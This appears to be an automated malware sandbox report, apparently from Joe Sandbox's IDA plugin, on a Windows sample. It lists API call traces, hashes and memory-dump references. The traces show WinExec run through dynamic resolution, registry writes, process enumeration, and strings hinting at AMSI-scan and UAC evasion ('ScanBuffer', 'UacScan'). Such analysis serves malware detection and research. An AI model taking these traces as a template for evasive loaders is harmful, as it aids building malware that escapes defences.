                                                                  • Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd
                                                                  Similarity
                                                                  • API ID: HandleModule$AddressProc$Exec
                                                                  • String ID: Kernel32$WinExec
                                                                  • API String ID: 2292790416-3609268280
                                                                  • Opcode ID: 4a2e81a97473eaa90b2622bb9e404f5d08c730433e86a9211d1fd73d2caf2709
                                                                  • Instruction ID: a239f68afab995509c8b75d867af43e9443338105d93a6ed8113e225cf19840e
                                                                  • Opcode Fuzzy Hash: 4a2e81a97473eaa90b2622bb9e404f5d08c730433e86a9211d1fd73d2caf2709
                                                                  • Instruction Fuzzy Hash: C6016DB16C0248AFE702FAE4DE11B9BB7EAEB08700F619425B900D2640D634AD118A64
                                                                  APIs
                                                                    • Part of subcall function 02EC81DC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02EC824C,?,?,00000000,?,02EC7A8E,ntdll,00000000,00000000,02EC7AD3,?,?,00000000), ref: 02EC821A
                                                                    • Part of subcall function 02EC81DC: GetModuleHandleA.KERNELBASE(?), ref: 02EC822E
                                                                    • Part of subcall function 02EC8284: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02EC830C,?,?,00000000,00000000,?,02EC8225,00000000,KernelBASE,00000000,00000000,02EC824C), ref: 02EC82D1
                                                                    • Part of subcall function 02EC8284: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02EC82D7
                                                                    • Part of subcall function 02EC8284: GetProcAddress.KERNEL32(?,?), ref: 02EC82E9
                                                                  • WinExec.KERNEL32(?,?), ref: 02EC8634
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd
                                                                  Similarity
                                                                  • API ID: HandleModule$AddressProc$Exec
                                                                  • String ID: Kernel32$WinExec
                                                                  • API String ID: 2292790416-3609268280
                                                                  • Opcode ID: 4d718d0c4be914187080ff48958b44ca398bc2d52ad76ea6d6b1081d80714483
                                                                  • Instruction ID: bc837d38f559305d05d70a760597d8d0922f1eb56535fec8e578391276ab096e
                                                                  • Opcode Fuzzy Hash: 4d718d0c4be914187080ff48958b44ca398bc2d52ad76ea6d6b1081d80714483
                                                                  • Instruction Fuzzy Hash: 30F081B16C0248AFE702FBE4DE11F9FB7EEEB08700F61D425B900D3640D634AD118A64
                                                                  APIs
                                                                  • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02EC5D84,?,?,02EC3910,00000001), ref: 02EC5C98
                                                                  • GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02EC5D84,?,?,02EC3910,00000001), ref: 02EC5CC6
                                                                    • Part of subcall function 02EB7D6C: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,02EC3910,02EC5D06,00000000,02EC5D84,?,?,02EC3910), ref: 02EB7DBA
                                                                    • Part of subcall function 02EB7FA8: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,02EC3910,02EC5D21,00000000,02EC5D84,?,?,02EC3910,00000001), ref: 02EB7FC7
                                                                  • GetLastError.KERNEL32(00000000,02EC5D84,?,?,02EC3910,00000001), ref: 02EC5D2B
                                                                    • Part of subcall function 02EBA788: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,02EBC3E9,00000000,02EBC443), ref: 02EBA7A7
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd
                                                                  Similarity
                                                                  • API ID: CreateErrorFileLast$FormatFullMessageNamePath
                                                                  • String ID:
                                                                  • API String ID: 503785936-0
                                                                  • Opcode ID: 140fecead8845d2724a3965b671fbdb74ace00e3796d928c4e9d2dab4defcfd2
                                                                  • Instruction ID: c97486c5b7cfdbbcd5d582d39c421ac177da5749c723eeb7bebf6d5d9ce3cc7e
                                                                  • Opcode Fuzzy Hash: 140fecead8845d2724a3965b671fbdb74ace00e3796d928c4e9d2dab4defcfd2
                                                                  • Instruction Fuzzy Hash: 95318070A803059FDB01EBA9C981BDFBBF6AF49700F90D069E404BB381D77569058FA1
                                                                  APIs
                                                                  • RegOpenKeyA.ADVAPI32(?,00000000,0302BA58), ref: 02ECF25C
                                                                  • RegSetValueExA.ADVAPI32(000008EC,00000000,00000000,00000001,00000000,0000001C,00000000,02ECF2C7), ref: 02ECF294
                                                                  • RegCloseKey.ADVAPI32(000008EC,000008EC,00000000,00000000,00000001,00000000,0000001C,00000000,02ECF2C7), ref: 02ECF29F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd
                                                                  Similarity
                                                                  • API ID: CloseOpenValue
                                                                  • String ID:
                                                                  • API String ID: 779948276-0
                                                                  • Opcode ID: d26090ab0b51080d0db5178f7d37736294417d6668f219590e5e07229ce5fcb4
                                                                  • Instruction ID: 53f29ae46c9f8367e33fee8facba6088dd181efb7ddaa8c9a453543691332315
                                                                  • Opcode Fuzzy Hash: d26090ab0b51080d0db5178f7d37736294417d6668f219590e5e07229ce5fcb4
                                                                  • Instruction Fuzzy Hash: 45112B71680205AFEB12EFA8DC91A9E7BEDEF08300B51A465B504D7695DB34EA008F54
                                                                  APIs
                                                                  • RegOpenKeyA.ADVAPI32(?,00000000,0302BA58), ref: 02ECF25C
                                                                  • RegSetValueExA.ADVAPI32(000008EC,00000000,00000000,00000001,00000000,0000001C,00000000,02ECF2C7), ref: 02ECF294
                                                                  • RegCloseKey.ADVAPI32(000008EC,000008EC,00000000,00000000,00000001,00000000,0000001C,00000000,02ECF2C7), ref: 02ECF29F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd
                                                                  Similarity
                                                                  • API ID: CloseOpenValue
                                                                  • String ID:
                                                                  • API String ID: 779948276-0
                                                                  • Opcode ID: 1c46638708fa7d36015267caaeb48e2f20c11a9e0d7e30235174a2e2d57a70f7
                                                                  • Instruction ID: a92ffdf31511aace9e361770a7fb3d74d190606198ec4a776ba3b71c6b1029bc
                                                                  • Opcode Fuzzy Hash: 1c46638708fa7d36015267caaeb48e2f20c11a9e0d7e30235174a2e2d57a70f7
                                                                  • Instruction Fuzzy Hash: 28113D71680205AFEB12EFA8DC91ADE7BEDEF08300F51A465F504D7695DB34EA008F54
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd
                                                                  Similarity
                                                                  • API ID: ClearVariant
                                                                  • String ID:
                                                                  • API String ID: 1473721057-0
                                                                  • Opcode ID: 0429ce5777ef982dec2131c53d7433393965e74984b423c80c95436b149d51e9
                                                                  • Instruction ID: a9433245f334c0b1c5cca442f115e1fbb377b66d63b9d5fc563f7045ea7aaf41
                                                                  • Opcode Fuzzy Hash: 0429ce5777ef982dec2131c53d7433393965e74984b423c80c95436b149d51e9
                                                                  • Instruction Fuzzy Hash: 5AF0A4647C8110CB972777389DC45EF26966F45308B98F436B4466B111CB29CC45CBB2
                                                                  APIs
                                                                  • SysFreeString.OLEAUT32(02ECF4A8), ref: 02EB4C6E
                                                                  • SysAllocStringLen.OLEAUT32(?,?), ref: 02EB4D5B
                                                                  • SysFreeString.OLEAUT32(00000000), ref: 02EB4D6D
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd
                                                                  Similarity
                                                                  • API ID: String$Free$Alloc
                                                                  • String ID:
                                                                  • API String ID: 986138563-0
                                                                  • Opcode ID: 3f1784c7bf07cd4297d24ff80a07666f1847e75eafdc0d720cb40ac94caab726
                                                                  • Instruction ID: dc40ec57bf9069314f612cec49ac839f3a7453f96f95567bd9cc9034ff654ce3
                                                                  • Opcode Fuzzy Hash: 3f1784c7bf07cd4297d24ff80a07666f1847e75eafdc0d720cb40ac94caab726
                                                                  • Instruction Fuzzy Hash: 7AE0C2B86812015EFF0B6F218D60BF7332AAFC2B95B14E498B804CE0A0D738C400BD38
                                                                  APIs
                                                                  • SysFreeString.OLEAUT32(?), ref: 02EC73EA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd
                                                                  Similarity
                                                                  • API ID: FreeString
                                                                  • String ID: H
                                                                  • API String ID: 3341692771-2852464175
                                                                  • Opcode ID: d0d2f2cc4f2fdab6e17e63a692ad85ca5377f809b8afe12d89ec9434be50eb1e
                                                                  • Instruction ID: d5c0b51a0c2e4e3536c9be6de1902ce82fdc8bec97d06e270fba191d4cd8e745
                                                                  • Opcode Fuzzy Hash: d0d2f2cc4f2fdab6e17e63a692ad85ca5377f809b8afe12d89ec9434be50eb1e
                                                                  • Instruction Fuzzy Hash: 4BB1E174A816089FDB15CF99D980A9DFBFAFF89314F24D169E805AB364D730A842CF50
                                                                  APIs
                                                                  • VariantCopy.OLEAUT32(00000000,00000000), ref: 02EBE791
                                                                    • Part of subcall function 02EBE374: VariantClear.OLEAUT32(?), ref: 02EBE383
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd
                                                                  Similarity
                                                                  • API ID: Variant$ClearCopy
                                                                  • String ID:
                                                                  • API String ID: 274517740-0
                                                                  • Opcode ID: 5db1e0d81818a7e84fd018e0103f41684282fe3fc32e7595e0d8f8d98cc66e74
                                                                  • Instruction ID: f8203e724cd9cc5b13575bf62ca83b69f56cfb001a4506a97e81e648c5fe49e0
                                                                  • Opcode Fuzzy Hash: 5db1e0d81818a7e84fd018e0103f41684282fe3fc32e7595e0d8f8d98cc66e74
                                                                  • Instruction Fuzzy Hash: 9111A3347846108BDB23AB29C9C4AE776AA9F4975079CF476F54A8B215DB34CC00CAA2
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd
                                                                  Similarity
                                                                  • API ID: InitVariant
                                                                  • String ID:
                                                                  • API String ID: 1927566239-0
                                                                  • Opcode ID: ad247a7679a21f9e67d1efa66b9fc4ec6dffab7282f9f98635e603838deb7f43
                                                                  • Instruction ID: 56d93a4f3d69e36e786db9ce44c53c77134abd22f02e022f245dadea19b16617
                                                                  • Opcode Fuzzy Hash: ad247a7679a21f9e67d1efa66b9fc4ec6dffab7282f9f98635e603838deb7f43
                                                                  • Instruction Fuzzy Hash: 9A315E71640209AFDB16DF98C884AEB77A9EF0D318F989561F905E3240D334DA50CBA1
                                                                  APIs
                                                                  • CLSIDFromProgID.OLE32(00000000,?,00000000,02EC6DC9,?,?,?,00000000), ref: 02EC6DA9
                                                                    • Part of subcall function 02EB4C60: SysFreeString.OLEAUT32(02ECF4A8), ref: 02EB4C6E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd
                                                                  Similarity
                                                                  • API ID: FreeFromProgString
                                                                  • String ID:
                                                                  • API String ID: 4225568880-0
                                                                  • Opcode ID: 9e4852c9714a2b082940d362d3604ca0a4e93dd1f10a5270eaf544966d4cd27f
                                                                  • Instruction ID: 5ec4d16e1d42da52d83da4dbcb5c3324f2d64d8b9e89b589ebbed264a38e07d8
                                                                  • Opcode Fuzzy Hash: 9e4852c9714a2b082940d362d3604ca0a4e93dd1f10a5270eaf544966d4cd27f
                                                                  • Instruction Fuzzy Hash: AFE0A0356842087BE712FAA6AD5198B7BADDF8A700B6198B5F400A3140DA309D008860
                                                                  APIs
                                                                  • GetModuleFileNameA.KERNEL32(02EB0000,?,00000105), ref: 02EB5886
                                                                    • Part of subcall function 02EB5ACC: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02EB0000,02EDE790), ref: 02EB5AE8
                                                                    • Part of subcall function 02EB5ACC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02EB0000,02EDE790), ref: 02EB5B06
                                                                    • Part of subcall function 02EB5ACC: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02EB0000,02EDE790), ref: 02EB5B24
                                                                    • Part of subcall function 02EB5ACC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02EB5B42
                                                                    • Part of subcall function 02EB5ACC: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02EB5BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02EB5B8B
                                                                    • Part of subcall function 02EB5ACC: RegQueryValueExA.ADVAPI32(?,02EB5D38,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02EB5BD1,?,80000001), ref: 02EB5BA9
                                                                    • Part of subcall function 02EB5ACC: RegCloseKey.ADVAPI32(?,02EB5BD8,00000000,?,?,00000000,02EB5BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02EB5BCB
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd
                                                                  Similarity
                                                                  • API ID: Open$FileModuleNameQueryValue$Close
                                                                  • String ID:
                                                                  • API String ID: 2796650324-0
                                                                  • Opcode ID: 450f0b7c147cec959141904987b0b6e2a54cef4eccdf5940c5d91eecae94a061
                                                                  • Instruction ID: ce92e3e26320b356c10034375582db52c9be8ce0a02a2e91b39a23fef47e8cb5
                                                                  • Opcode Fuzzy Hash: 450f0b7c147cec959141904987b0b6e2a54cef4eccdf5940c5d91eecae94a061
                                                                  • Instruction Fuzzy Hash: D7E03971A402148BCB11DE98C8C0A873398AF08754F449961AC58DF246D7B0D9108BE0
                                                                  APIs
                                                                  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 02EB7E04
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd
                                                                  Similarity
                                                                  • API ID: FileWrite
                                                                  • String ID:
                                                                  • API String ID: 3934441357-0
                                                                  • Opcode ID: 245f9e59dba5418514fab60bbf667c473568b506f2f627899943ec5f0ff1d88a
                                                                  • Instruction ID: 78e0db1bec983cfd002eb97bc46897b8fe3678a5a4e90a45606e436ece1a55c5
                                                                  • Opcode Fuzzy Hash: 245f9e59dba5418514fab60bbf667c473568b506f2f627899943ec5f0ff1d88a
                                                                  • Instruction Fuzzy Hash: 51D05B763081507BE220955A5D44EE75BDCCFC6770F10463DB558C7180D7208C01C671
                                                                  APIs
                                                                    • Part of subcall function 02ECAB20: GetModuleHandleA.KERNEL32(kernel32.dll,00000002,02ECADA7,?,?,02ECAE39,00000000,02ECAF15), ref: 02ECAB34
                                                                    • Part of subcall function 02ECAB20: GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02ECAB4C
                                                                    • Part of subcall function 02ECAB20: GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02ECAB5E
                                                                    • Part of subcall function 02ECAB20: GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02ECAB70
                                                                    • Part of subcall function 02ECAB20: GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02ECAB82
                                                                    • Part of subcall function 02ECAB20: GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02ECAB94
                                                                    • Part of subcall function 02ECAB20: GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02ECABA6
                                                                    • Part of subcall function 02ECAB20: GetProcAddress.KERNEL32(00000000,Process32First), ref: 02ECABB8
                                                                    • Part of subcall function 02ECAB20: GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02ECABCA
                                                                    • Part of subcall function 02ECAB20: GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02ECABDC
                                                                    • Part of subcall function 02ECAB20: GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02ECABEE
                                                                    • Part of subcall function 02ECAB20: GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02ECAC00
                                                                    • Part of subcall function 02ECAB20: GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02ECAC12
                                                                    • Part of subcall function 02ECAB20: GetProcAddress.KERNEL32(00000000,Module32First), ref: 02ECAC24
                                                                    • Part of subcall function 02ECAB20: GetProcAddress.KERNEL32(00000000,Module32Next), ref: 02ECAC36
                                                                    • Part of subcall function 02ECAB20: GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 02ECAC48
                                                                    • Part of subcall function 02ECAB20: GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 02ECAC5A
                                                                  • Process32First.KERNEL32(?,00000128), ref: 02ECADCD
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$FirstHandleModuleProcess32
                                                                  • String ID:
                                                                  • API String ID: 2774106396-0
                                                                  • Opcode ID: 59bfbdff52b45209e6d264c435f6246b42332e9841322429739983092c8e4b98
                                                                  • Instruction ID: fd52be608b94472be3c1cefddde51456ff70525f21122fd20ee8e433222925de
                                                                  • Opcode Fuzzy Hash: 59bfbdff52b45209e6d264c435f6246b42332e9841322429739983092c8e4b98
                                                                  • Instruction Fuzzy Hash: E0C012B3A61228169A1079F429844C2974ED9460EA3145472B508D2201E7154C1192E0
                                                                  APIs
                                                                  • GetFileAttributesA.KERNEL32(00000000,?,02ED3573,ScanString,02F37380,02EDB7BC,OpenSession,02F37380,02EDB7BC,ScanBuffer,02F37380,02EDB7BC,OpenSession,02F37380,02EDB7BC,Initialize), ref: 02EB7E9B
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd
                                                                  Similarity
                                                                  • API ID: AttributesFile
                                                                  • String ID:
                                                                  • API String ID: 3188754299-0
                                                                  • Opcode ID: fe3f8c7547375d3b190e2bd7b8d67a4577ec7d15bc45dec9ccb4955a6e8d04a7
                                                                  • Instruction ID: af82bbb2d4d1e933a35c3557ff6a93ae556669082bf3f4d152897bef26b88b40
                                                                  • Opcode Fuzzy Hash: fe3f8c7547375d3b190e2bd7b8d67a4577ec7d15bc45dec9ccb4955a6e8d04a7
                                                                  • Instruction Fuzzy Hash: D7C08CB62812010A2F52A6BC1CC12DB43C80D8823C360BE69F0B8CA6C2D321982A2860
                                                                  APIs
                                                                  • GetFileAttributesA.KERNEL32(00000000,?,02ED0423,ScanString,02F37380,02EDB7BC,OpenSession,02F37380,02EDB7BC,ScanString,02F37380,02EDB7BC,UacScan,02F37380,02EDB7BC,UacInitialize), ref: 02EB7E77
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2eb0000_1m181Ru74o.jbxd
                                                                  Similarity
                                                                  • API ID: AttributesFile
                                                                  • String ID:
                                                                  • API String ID: 3188754299-0
                                                                  • Opcode ID: 23fb81311ad07fae81732db0edde70c56cded36c5311baf0953a0f48c8330ef0
                                                                  • Instruction ID: 4403ff2ce73959ad413f457f97d5faec11aeefec2465e353dda981dde1eda607
                                                                  • Opcode Fuzzy Hash: 23fb81311ad07fae81732db0edde70c56cded36c5311baf0953a0f48c8330ef0
                                                                  • Instruction Fuzzy Hash: 75C08CB62812000A6E5366BC2CC92CB42C90E8823C368BE65F028C65D2E731982A2810
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1427879050.0000000002EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1427857534.0000000002EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.0000000002EDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1428011710.000000000302E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
